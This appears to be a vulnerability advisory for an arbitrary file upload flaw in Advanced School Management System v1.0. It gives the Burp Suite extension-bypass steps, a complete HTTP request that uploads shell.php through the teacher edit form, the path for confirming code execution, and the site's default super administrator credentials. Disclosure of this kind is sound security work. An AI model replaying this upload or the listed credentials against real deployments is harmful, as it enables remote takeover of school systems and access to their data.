Advanced School Management System v1.0 Arbitrary File Upload RCE

Key vulnerability information obtained from the webpage screenshot: ### Vulnerability Overview **Name**: Advanced School Management System v1.0 Remote Code Execution (RCE) ### Vulnerability Details - **Affected Version**: v1.0 - **Vendor**: https://itsourcecode.com/free-projects/php-project/advanced-school-management-system-in-php-with-source-code/ - **Vulnerability Type**: Remote Code Execution (RCE) - **Vulnerable File**: `ip/school/view/all_teacher.php` - **Vulnerable Function**: "edit" function ### Vulnerability Description - In the TEACHER module of the backend management system, there is an arbitrary file upload vulnerability (RCE) in the file upload point of the "edit" function. - The vulnerability can be exploited by changing the file extension (e.g., renaming `shell.php` to `shell.png`) to bypass frontend checks, then intercepting the request using Burp Suite to restore the original `.php` extension, successfully uploading the `shell.php` file. ### Vulnerability Verification - **Upload Request Example**: ```http POST /school/index.php HTTP/1.1 Host: 192.168.1.19 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate DNT: 1 Referer: http://192.168.1.19/school/view/all_teacher.php Cookie: PHPSESSID=kh42r202aj35u61brcutn42s96 Connection: close Content-Type: multipart/form-data; boundary=---------------------------12765172874523 Content-Length: 1148 -----------------------------12765172874523 Content-Disposition: form-data; name="full_name" Teacher 6 -----------------------------12765172874523 Content-Disposition: form-data; name="i_name" Teacher 6 -----------------------------12765172874523 Content-Disposition: form-data; name="address" School -----------------------------12765172874523 Content-Disposition: form-data; name="gender" Male -----------------------------12765172874523 Content-Disposition: form-data; name="phone" 666-666-6666 -----------------------------12765172874523 Content-Disposition: form-data; name="email" t6@gmail.com -----------------------------12765172874523 Content-Disposition: form-data; name="fileToUpload"; filename="shell.php" Content-Type: image/jpeg JFIF -----------------------------12765172874523 Content-Disposition: form-data; name="c_page" 1 -----------------------------12765172874523 Content-Disposition: form-data; name="id" 15 -----------------------------12765172874523 Content-Disposition: form-data; name="do" update_teacher -----------------------------12765172874523-- ``` - **Uploaded File Path**: `\school\uploads` - **Verification Execution**: Accessing `http://192.168.1.19/school/uploads/2022063025545.php` confirms that the code was executed successfully. ### Additional Information - **Super Administrator Account**: Username: `superheroes`, Email: `suarez081119@gmail.com`, Password: `12345`

Goal Reached Thanks to every supporter — we hit 100%!

Advanced School Management System v1.0 Arbitrary File Upload RCE

More from this source